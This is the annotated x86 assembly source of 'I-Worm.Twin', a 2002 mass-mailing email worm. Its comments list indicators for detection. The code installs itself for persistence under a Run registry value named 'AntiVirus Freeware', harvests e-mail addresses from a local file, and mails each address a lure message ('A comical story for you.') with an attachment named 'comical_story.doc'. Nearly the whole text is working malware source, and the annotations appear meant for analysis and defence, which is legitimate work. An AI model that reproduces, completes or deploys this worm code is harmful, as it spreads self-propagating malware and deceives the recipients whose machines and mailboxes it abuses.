comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes

Action : See yourself. It's not complex.
#

; Assembler setup: TASM-style directives (Ideal/MASM-mode `JUMPS`, `macro`/`endm`),
; 32-bit flat memory model.
.586p
.model flat
.code

; JUMPS lets the assembler rewrite out-of-range conditional jumps automatically.
JUMPS

; api <name>: declares <name> as an external procedure and calls it.
; Every Win32 import in this listing goes through this macro, so the import
; table of the built binary mirrors the `api` call sites one-to-one.
api macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

; Entry point: persistence and path set-up.
;   1. Stores this executable's own path in `orig_worm`.
;   2. Writes that path as a Run value under HKEY_LOCAL_MACHINE (80000002h).
;   3. Deletes C:\twin.vbs.
;   4. Builds "<Windows dir>\NetInfo.doc" in `pathname`.
; Arguments are pushed right-to-left (stdcall). @pushsz comes from an include
; that is not shown here; presumably it pushes the address of the inline
; string -- confirm against useful.inc.
; Host artefacts visible in this block (for detection and clean-up):
;   - value "AntiVirus Freeware" under
;     HKLM\Software\Microsoft\Windows\CurrentVersion\Run
;   - C:\twin.vbs (only deleted here; nothing in this listing creates it)
;   - <Windows dir>\NetInfo.doc (only the path is built here; nothing in this
;     listing writes the file)
start:	push	50				; nSize: capacity of orig_worm
	mov	esi,offset orig_worm
	push	esi				; lpFilename
	push	0				; hModule = NULL -> current process image
	api	GetModuleFileNameA

	push	25				; cbData: hard-coded, not derived from the path length
	push	esi				; pvData = own path (esi still points at orig_worm)
	push	1				; dwType = 1 (REG_SZ)
	@pushsz	"AntiVirus Freeware"		; value name, chosen to look benign
	@pushsz	"Software\Microsoft\Windows\CurrentVersion\Run"
	push	80000002h			; HKEY_LOCAL_MACHINE
	api	SHSetValueA

	@pushsz "C:\twin.vbs"
	api	DeleteFileA

	push	50				; uSize: capacity of pathname
	push	offset pathname
	api	GetWindowsDirectoryA
	@pushsz	"\NetInfo.doc"
	push	offset pathname
	api	lstrcat				; pathname = "<Windows dir>\NetInfo.doc"

; Waits for connectivity, then maps C:\backup.win read-only.
; Register roles after this block: ebx = file handle, ebp = mapping handle,
; esi = base of the mapped view.
; C:\backup.win is opened with OPEN_EXISTING, so it must already exist; nothing
; in this listing creates it (presumably another component does -- confirm).
verif_inet:
	push	0				; dwReserved
	push	offset inet			; lpdwFlags (result is not inspected afterwards)
	api	InternetGetConnectedState
	dec	eax				; return value 1 -> 0
	jnz	verif_inet			; repeat until the call returns 1; no delay between polls

	push	0				; hTemplateFile
	push	0				; dwFlagsAndAttributes
	push	3				; dwCreationDisposition = 3 (OPEN_EXISTING)
	push	0				; lpSecurityAttributes
	push	1				; dwShareMode = 1 (FILE_SHARE_READ)
	push	80000000h			; dwDesiredAccess = GENERIC_READ
	@pushsz	"C:\backup.win"
	api	CreateFileA
	inc	eax				; INVALID_HANDLE_VALUE (-1) becomes 0
	je	end_worm			; file missing or unreadable: exit
	dec	eax				; restore the handle value
	xchg	ebx,eax				; ebx = file handle

	push	0				; lpName (unnamed mapping)
	push	0				; dwMaximumSizeLow  (0/0 = whole file)
	push	0				; dwMaximumSizeHigh
	push	2				; flProtect = 2 (PAGE_READONLY)
	push	0				; lpAttributes
	push	ebx				; hFile
	api	CreateFileMappingA
	test	eax,eax
	je	end_w1				; failure: close the file handle only
	xchg	eax,ebp				; ebp = mapping handle

	push	0				; dwNumberOfBytesToMap (0 = to end of mapping)
	push	0				; dwFileOffsetLow
	push	0				; dwFileOffsetHigh
	push	4				; dwDesiredAccess = 4 (FILE_MAP_READ)
	push	ebp				; hFileMappingObject
	api	MapViewOfFile
	test	eax,eax
	je	end_w2				; failure: close mapping, then file
	xchg	eax,esi				; esi = view base, read by lodsb below

	push	0				; lpFileSizeHigh
	push	ebx
	api	GetFileSize
	cmp	eax,3				; size is only compared with 3 and not kept afterwards
	jbe	end_w3				; 3 bytes or fewer: nothing to parse

; Address harvesting loop over the mapped view of C:\backup.win.
; Copies bytes from [esi] into `mail_addr` until a line break, then calls
; send_mail for every line that contained at least one '@'.
;   esi = read cursor in the view, edi = write cursor in mail_addr,
;   edx = number of '@' characters seen on the current line.
; A '#' byte ends the scan. No check against the file size or against the
; 128-byte size of mail_addr is visible in this loop.
scan_mail:
	xor	edx,edx				; reset '@' counter for the new line
	mov	edi,offset mail_addr
	push	edi				; saved start of buffer, popped at entr1/entr2
	p_c:	lodsb				; al = next byte, esi advances by one
	cmp	al," "
	je	car_s
	cmp	al,0dh				; CR
	je	entr1
	cmp	al,0ah				; LF
	je	entr2
	cmp	al,"#"				; end-of-list marker
	je	f_mail
	cmp	al,'@'
	jne	not_a
	inc	edx				; line looks like an e-mail address
	not_a:	stosb				; append byte to mail_addr
		jmp p_c
	car_s:	inc esi				; on a space: advances esi once more, so the byte after the space is skipped too
		jmp p_c
	entr1:	xor al,al
		stosb				; NUL-terminate the collected string
		pop edi
		test edx,edx
		je  scan_mail			; no '@' on this line: skip it
		call send_mail			; mail_addr is referenced by MsgTo
		jmp scan_mail
	entr2:	xor al,al
		stosb				; LF: terminate and restart without sending
		pop edi
		jmp scan_mail
	f_mail:					; '#' reached: falls through to the cleanup code (the pushed edi is not popped on this path)

; Cleanup ladder and exit. Each label releases one more resource, so the
; failure paths above jump to the label matching what had been acquired:
; end_w3 = view + mapping + file, end_w2 = mapping + file, end_w1 = file only.
; When reached from the scan loop, esi is the advanced read cursor rather than
; the address MapViewOfFile returned.
end_w3:	push	esi
	api	UnmapViewOfFile
end_w2:	push	ebp				; mapping handle
	api	CloseHandle
end_w1:	push	ebx				; file handle
	api	CloseHandle


; Terminates the process with exit code 0.
end_worm:
	push	0
	api	ExitProcess

; send_mail: hands the static `Message` structure to Simple MAPI.
; Called once per harvested address; the recipient is whatever string is in
; mail_addr at that moment (MsgTo points at it).
; Call made: MAPISendMail(lhSession=[sess], ulUIParam=0, lpMessage=&Message,
;                         flFlags=0, ulReserved=0).
; `sess` is 0 in .data and is not written anywhere in this listing.
; The return value of MAPISendMail is not checked.
; Clobbers eax (and whatever the API clobbers under stdcall).
send_mail:
	xor	eax,eax
	push	eax				; ulReserved
	push	eax				; flFlags = 0
	push	offset Message			; lpMessage
	push	eax				; ulUIParam
	push	[sess]				; lhSession
	api	MAPISendMail
	ret

; Data section: work buffers, the fixed mail text, and the Simple MAPI
; structures passed to MAPISendMail.
; Mail-side indicators visible here (for gateway / mailbox filtering):
;   subject    "A comical story for you."
;   body start "I send you a comical story found on the Net."
;   attachment shown to the recipient as "comical_story.doc"
.data
orig_worm	db 50 dup (0)			; own module path (GetModuleFileNameA, 50 bytes)
pathname	db 50 dup (0)			; "<Windows dir>\NetInfo.doc", the file attached to each mail
mail_addr	db 128 dup (?)			; current harvested address, filled by scan_mail
inet		dd 0				; flags output of InternetGetConnectedState
sess		dd 0				; MAPI session handle; stays 0 in this listing

subject		db "A comical story for you.",0
body		db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
		db 9,"Best Regards. You friend.",0
filename	db "comical_story.doc",0	; display name of the attachment

; Field names below follow the MapiMessage / MapiRecipDesc / MapiFileDesc
; layouts from mapi.h, matched by position.
Message		dd ?				; ulReserved
		dd offset subject		; lpszSubject
		dd offset body			; lpszNoteText
		dd ?				; lpszMessageType
		dd ?				; lpszDateReceived
		dd ?				; lpszConversationID
		dd 2				; flFlags (2 = MAPI_RECEIPT_REQUESTED in mapi.h -- confirm)
		dd offset MsgFrom		; lpOriginator
		dd 1				; nRecipCount
		dd offset MsgTo			; lpRecips
		dd 1				; nFileCount
		dd offset Attach		; lpFiles

; Originator descriptor: every field left unset.
MsgFrom		dd ?
		dd ?
		dd ?
		dd ?
		dd ?
		dd ?

MsgTo		dd ?				; ulReserved
		dd 1				; ulRecipClass = 1 (MAPI_TO)
		dd offset mail_addr		; lpszName
		dd offset mail_addr		; lpszAddress (same buffer as the name)
		dd ?				; ulEIDSize
		dd ?				; lpEntryID

Attach		dd ?				; ulReserved
		dd ?				; flFlags
		dd ?				; nPosition
		dd offset pathname		; lpszPathName: file on disk (NetInfo.doc)
		dd offset filename		; lpszFileName: name the recipient sees
		dd ?				; lpFileType


end start
end